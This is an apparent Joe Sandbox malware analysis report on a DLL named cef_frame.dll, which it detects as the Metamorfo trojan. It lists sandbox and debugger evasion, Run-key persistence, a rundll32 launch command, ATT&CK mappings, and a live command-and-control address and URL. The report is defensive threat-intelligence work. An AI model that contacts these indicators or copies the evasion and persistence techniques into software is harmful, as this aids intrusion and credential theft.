    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    barindex
    Switches to a custom stack to bypass stack traces
    Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 440FE3C
    Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 32CB672
    Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 41A6910
    Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 4187ACC
    Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 3259D4F
    Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 32BA640
    Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 43BC1D8
    Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 320F8C7
    Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 4408BAB
    Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 320E2F8
    Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 416AC56
    Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 42261E6
    Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 3309BED
    Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 4705DCE
    Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 330D7F9
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
    Source: Amcache.hve.11.drBinary or memory string: VMware
    Source: Amcache.hve.11.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.11.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.11.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.11.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.11.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.11.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.11.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.11.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
    Source: rundll32.exe, 00000011.00000002.2897887119.0000000003376000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln'I
    Source: Amcache.hve.11.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.11.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.11.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.11.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.11.drBinary or memory string: vmci.sys
    Source: Amcache.hve.11.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.11.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.11.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.11.drBinary or memory string: VMware20,1
    Source: Amcache.hve.11.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.11.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.11.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.11.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.11.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.11.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.11.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.11.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.11.drBinary or memory string: VMware Virtual RAM
    Source: Amcache.hve.11.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.11.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Windows\System32\loaddll32.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 15.228.77.178 80Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",#1Jump to behavior
    Source: Amcache.hve.11.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.11.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.11.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.11.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
    Source: Amcache.hve.11.drBinary or memory string: MsMpEng.exe
    Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

    Stealing of Sensitive Information

    barindex
    Yara detected Metamorfo
    Source: Yara matchFile source: dump.pcap, type: PCAP

    Remote Access Functionality

    barindex
    Yara detected Metamorfo
    Source: Yara matchFile source: dump.pcap, type: PCAP

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation    		11
    Registry Run Keys / Startup Folder    		111
    Process Injection    		1
    Masquerading    		1
    Credential API Hooking    		131
    Security Software Discovery    		Remote Services1
    Credential API Hooking    		2
    Non-Application Layer Protocol    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    DLL Side-Loading    		11
    Registry Run Keys / Startup Folder    		11
    Virtualization/Sandbox Evasion    		LSASS Memory1
    Process Discovery    		Remote Desktop ProtocolData from Removable Media12
    Application Layer Protocol    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading    		111
    Process Injection    		Security Account Manager11
    Virtualization/Sandbox Evasion    		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Rundll32    		NTDS11
    System Information Discovery    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading    		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1592146 Sample: cef_frame.dll Startdate: 15/01/2025 Architecture: WINDOWS Score: 100 39 171.39.242.20.in-addr.arpa 2->39 49 Suricata IDS alerts for network traffic 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 Yara detected Metamorfo 2->53 55 3 other signatures 2->55 9 loaddll32.exe 1 2->9         started        12 rundll32.exe 2->12         started        14 rundll32.exe 2->14         started        signatures3 process4 signatures5 57 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 9->57 59 Overwrites code with function prologues 9->59 61 Switches to a custom stack to bypass stack traces 9->61 16 rundll32.exe 1 18 9->16         started        20 rundll32.exe 9->20         started        22 rundll32.exe 9->22         started        24 6 other processes 9->24 process6 dnsIp7 37 15.228.77.178, 49852, 80 AMAZON-02US United States 16->37 41 System process connects to network (likely due to code injection or exploit) 16->41 43 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 16->43 45 Creates an autostart registry key pointing to binary in C:\Windows 16->45 47 Overwrites code with function prologues 20->47 26 rundll32.exe 24->26         started        29 WerFault.exe 16 24->29         started        31 WerFault.exe 23 16 24->31         started        33 3 other processes 24->33 signatures8 process9 signatures10 63 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 26->63 35 WerFault.exe 2 16 26->35         started        process11

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    cef_frame.dll30%VirustotalBrowse
    cef_frame.dll34%ReversingLabs
    cef_frame.dll100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://15.228.77.178/ytr/serv.php0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    171.39.242.20.in-addr.arpa
    		unknown
    		unknownfalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://15.228.77.178/ytr/serv.phptrue
      • Avira URL Cloud: safe
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://upx.sf.netAmcache.hve.11.drfalse
        		high
        http://www.indyproject.org/rundll32.exe, 00000003.00000002.2431194998.0000000004B51000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.2563309483.000000000851F000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2571642187.00000000045F1000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.2577672561.0000000007E8F000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2462605650.000000000844F000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.2973058518.0000000007F3F000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.2961091409.00000000045F1000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000011.00000002.2906768585.000000000851F000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2898272562.0000000004BD1000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000012.00000003.2817042023.000000000825F000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2865149640.00000000082CF000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2825340181.0000000004A51000.00000020.00000001.01000000.00000003.sdmpfalse
          		high

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          15.228.77.178
          		unknownUnited States
          		16509AMAZON-02UStrue

          General Information

          Joe Sandbox version:42.0.0 Malachite
          Analysis ID:1592146
          Start date and time:2025-01-15 20:36:10 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 6m 37s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:30
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:cef_frame.dll
          Detection:MAL
          Classification:mal100.troj.evad.winDLL@28/29@1/1
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .dll

          Warnings

          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 20.42.65.92, 20.42.73.29, 52.182.143.212, 13.107.246.45, 172.202.163.200, 20.190.159.4, 20.242.39.171, 4.245.163.56
          • Excluded domains from analysis (whitelisted): client.wns.windows.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          14:37:31API Interceptor6x Sleep call for process: WerFault.exe modified
          14:37:37API Interceptor1x Sleep call for process: rundll32.exe modified
          14:37:49API Interceptor1x Sleep call for process: loaddll32.exe modified
          20:38:04AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          20:38:13AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run rundll32.exe C:\Windows\SysWOW64\rundll32.exe

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          15.228.77.178SecuriteInfo.com.Variant.Barys.394881.27394.14169.dllGet hashmaliciousUnknownBrowse
            SecuriteInfo.com.Variant.Barys.394881.27394.14169.dllGet hashmaliciousUnknownBrowse
              f_4_T_u_r_4_34536_45645_3345_wo.msiGet hashmaliciousUnknownBrowse
                n_f_3_e_l_3_t_r_0_n_1_k_4_00545.msiGet hashmaliciousUnknownBrowse
                  n_f_3_f_1_s_k_4_l.msiGet hashmaliciousUnknownBrowse
                    Mandado-Intima#U00e7#U00e3o_Art516mlhg.msiGet hashmaliciousUnknownBrowse
                      z12A____o-Trabalhista.msiGet hashmaliciousUnknownBrowse
                        z1F_4_T_U_r_4_2024mfdfgryry5.msiGet hashmaliciousUnknownBrowse
                          F_4_T_U_R_4___nf____0992344.4354.msiGet hashmaliciousUnknownBrowse
                            rPEDIDOS-10032023-X491kkum.msiGet hashmaliciousUnknownBrowse

                              Domains

                              No context

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              AMAZON-02USHandler.exeGet hashmaliciousDanaBot, PureLog Stealer, VidarBrowse
                              • 108.139.47.33
                              https://fingertip.com/incoming-documentGet hashmaliciousHTMLPhisherBrowse
                              • 3.5.169.67
                              https://q89x88qh.r.ap-southeast-1.awstrack.me/L0/https:%2F%2Fblackdoor.in%2Fcazxccall%2Frtyucallingzxc%2F/1/010e01946a4fedf7-6a14e9da-4611-4b34-a7c5-f58f00519f0d-000000/p9HvzYrykwYBivTgZCa5Kf2-wBc=194Get hashmaliciousUnknownBrowse
                              • 52.74.136.124
                              https://lgray785.wixsite.com/my-site-4Get hashmaliciousHTMLPhisherBrowse
                              • 99.86.4.105
                              New order BPD-003777.exeGet hashmaliciousFormBookBrowse
                              • 13.248.169.48
                              QQE81XYXon.dllGet hashmaliciousWannacryBrowse
                              • 63.35.17.92
                              PO -2025918.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • 13.248.169.48
                              txWVWM8Kx4.dllGet hashmaliciousWannacryBrowse
                              • 52.34.64.1
                              hNgIvHRuTU.dllGet hashmaliciousWannacryBrowse
                              • 13.229.164.57
                              https://docs.google.com/drawings/d/1Fix-5JDCTM2QJpjq3c_NOGTxMuhYRiEX3wdVSCqQc9w/preview?FwaxQGet hashmaliciousUnknownBrowse
                              • 18.245.46.111

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_7591fc8fec8e7029e898d42763d73b8da5475a63_7522e4b5_9b017aa6-82f9-4ef9-95b7-802827d4aa29\Report.wer

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):1.1801313481517355
                              Encrypted:false
                              SSDEEP:192:Wt/di4Owm0kVvf1jeT/JZrtUKnzzuiFOZ24IO8dci:mipwNkVvf1jeJzzuiFOY4IO8dci
                              MD5:4825D64D38820A91F9350C58599D4D95
                              SHA1:8279E87418CD338C0149513DC9FDAE58F86870FF
                              SHA-256:B0ABC4C2E331980BE5467E5AB8321B7E0757EC846E0ED03359E34A79B955D6F0
                              SHA-512:1C278D5608E328477CF704F73CF74F124A49C7C166FA18DC461EF89872A041DCAFEE0970826590B2883C66C19CB45D68FEA0CD8CF050ABB1FBEE612C1E5849C9
                              Malicious:false
                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.4.4.3.4.9.5.9.3.2.5.5.5.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.4.4.3.4.9.6.6.3.5.7.3.3.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.b.0.1.7.a.a.6.-.8.2.f.9.-.4.e.f.9.-.9.5.b.7.-.8.0.2.8.2.7.d.4.a.a.2.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.b.3.e.5.d.d.f.-.2.5.5.3.-.4.e.c.e.-.b.b.7.c.-.b.8.d.3.a.0.e.0.c.7.c.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.4.8.-.0.0.0.1.-.0.0.1.5.-.9.f.5.1.-.a.0.f.5.8.4.6.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.

                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_7afeb34b9381e236431c2083137ba553289cac_7522e4b5_63c1e111-9e9d-4ff2-95f0-a845ef4bf8ac\Report.wer

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):0.990564090228084
                              Encrypted:false
                              SSDEEP:192:L2bqiAORbA0BU/wjeTO1KZrQtzuiFOZ24IO8dci:LixRbbBU/wjeGzuiFOY4IO8dci
                              MD5:16C3DD073E1FEE4FA2D5AF6C158CA75A
                              SHA1:8597182586234587FBE8AEFC62390409AA1F31D8
                              SHA-256:0B042E0023195870251F88A76AD453658218C1F935E635CD561A4023937A4BE2
                              SHA-512:EA9AA7784866194D0AB5F61B6EEF5ABFE57D7C7F400F97A65F299D520690F81BDF37802CF581BB59B69AB8D4A10C4B04BC5B652B83E37A09BF356420A14B4257
                              Malicious:false
                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.4.4.3.4.4.4.0.1.5.7.1.9.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.4.4.3.4.4.5.8.7.5.1.8.5.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.3.c.1.e.1.1.1.-.9.e.9.d.-.4.f.f.2.-.9.5.f.0.-.a.8.4.5.e.f.4.b.f.8.a.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.2.3.3.3.9.4.c.-.8.c.9.d.-.4.1.d.5.-.8.4.6.c.-.0.a.2.b.b.9.4.b.2.0.2.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.f.8.-.0.0.0.1.-.0.0.1.5.-.3.e.2.9.-.6.8.d.8.8.4.6.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.

                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_7afeb34b9381e236431c2083137ba553289cac_7522e4b5_6854b7e0-e93f-4f5e-82d4-8d9d3f5c919f\Report.wer

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):0.9905160130207232
                              Encrypted:false
                              SSDEEP:192:KPVmi/OHbA0BU/wjeT/KKZrQtzuiFpZ24IO8dci:MAimHbbBU/wjeuzuiFpY4IO8dci
                              MD5:563C8DDF572179D2797812CEDEB7DCBC
                              SHA1:AAE288012993795F42B282EB96618709C4055904
                              SHA-256:C1803B30825FDD183AFCCE73C35BD6A5E0612BFDECBBC6D98DCEC9794FCBBABB
                              SHA-512:07D8E22052A6A792898CE175D8E6B566771BD5F68E44902600806A23D09C7E05EA6BFB7004F8C28C89A6D71DB65E1EC881E59D93B7E0B29E6395BC689C9467C5
                              Malicious:false
                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.4.4.3.5.0.3.2.6.7.2.6.7.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.4.4.3.5.0.3.7.0.4.7.0.7.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.8.5.4.b.7.e.0.-.e.9.3.f.-.4.f.5.e.-.8.2.d.4.-.8.d.9.d.3.f.5.c.9.1.9.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.5.9.0.9.7.6.f.-.c.9.c.7.-.4.3.9.a.-.8.a.9.9.-.e.1.d.9.7.1.a.5.6.2.0.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.8.8.-.0.0.0.1.-.0.0.1.5.-.e.d.c.2.-.9.d.f.5.8.4.6.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.

                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_a0314137803a1043baaff1e9589f71f27add7_7522e4b5_8bf32f65-3215-4748-89de-3da7dc265df5\Report.wer

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):0.9961063049359593
                              Encrypted:false
                              SSDEEP:192:UBiCOfb20BU/wjeT/KKZrQtzuiFOZ24IO84ci:eijfbdBU/wjeuzuiFOY4IO84ci
                              MD5:570261F1A3B729446127639B1222F5A0
                              SHA1:030FB6CAE3935F0EBF3978D29F51D5F91754DE73
                              SHA-256:E13B91E46434568034F9C1FFF2BBAC01F9B9E4751235B9CB137BE8F38495B77B
                              SHA-512:6335328EF95660F938E34FE0C8A1ACB0E9840FB54AD567487BDE876478712F523996232433E8C0446B3D9A4C9D68C08F611CCBA1EA33A610EFA46779FA9085DA
                              Malicious:false
